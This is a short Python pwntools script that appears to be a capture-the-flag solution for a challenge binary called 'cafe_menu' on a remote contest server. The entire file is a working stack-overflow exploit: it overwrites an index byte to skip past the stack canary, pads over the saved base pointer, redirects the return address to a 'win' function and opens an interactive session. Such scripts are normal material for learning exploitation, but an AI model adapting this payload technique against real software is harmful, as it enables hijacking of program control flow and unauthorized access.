#!/usr/bin/env python3
from pwn import *

elf = context.binary = ELF("./cafe_menu", checksec=False)

BUF_LEN = 48
# CANARY_OFF = 50
AFTER_CANARY = 0x3F
# p = process(elf.path)
p = remote("offsec.m0lecon.it", 13563)
print(p.recvline())
# We can overwrite IDX to make it write on the stack after the canary position
payload = flat(
    b"A" * 48,
    b"\x3f",  # After canary offset found
    b"A" * 8,  # Skip rbp
    p64(0x401262),  # win
    b"\xff",
)
p.send(payload)
print(p.recvline())
p.interactive()